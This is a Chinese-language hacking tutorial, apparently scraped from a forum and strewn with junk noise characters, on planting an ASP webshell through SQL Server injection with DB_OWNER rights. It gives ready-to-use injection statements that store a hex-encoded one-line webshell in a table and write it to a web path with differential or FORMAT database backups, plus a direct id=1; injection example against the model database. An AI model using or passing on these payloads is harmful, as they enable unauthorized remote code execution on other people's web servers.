DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
5 A0 W4 U+ S' x' d2 Y: J
减少备份文件大小，得到可执行的webshell成功率提高不少
1 z7 P- r0 Q2 ]一利用差异备份
加一个参数WITH DIFFERENTIAL

7 N( C) C9 R) g1
2
3
3 M3 s; \/ z5 S1 t* [* S4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
# N) U+ D5 o  o, N' m* j) Gcreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
' Z8 V+ R2 q7 N/ O! X- [) }* Gdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
& I% j/ h0 E$ Y0 ~: O, ~9 q, O
二利用完全FORMAT
加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
9 a0 M# m+ n6 h  @* c" V3 w
1
! J# U% l2 S' Q: C& E2
3
4
- {. h  F- U0 ?6 d declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
4 t5 h2 H. @0 D1 \; Z- h* K+ c
总的来说就是那么简单几句,下面以备份数据库model为例子
1

: z" D6 ~% S( I4 R1
! V# e; ?2 O8 X- y4 `7 s- S+ F id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
9 u/ `3 r5 _+ V& {/ ~/ Z( h+ [4 M
2

* f: Y7 \0 k% K8 _# b7 W0 J) \1
: F" Y. Y+ n. |6 r, |! x0 y* ^ id=1;backup database model to disk='你的路径‘ with differential,format;--
  R9 [1 I9 c" T( i6 h' G5 ]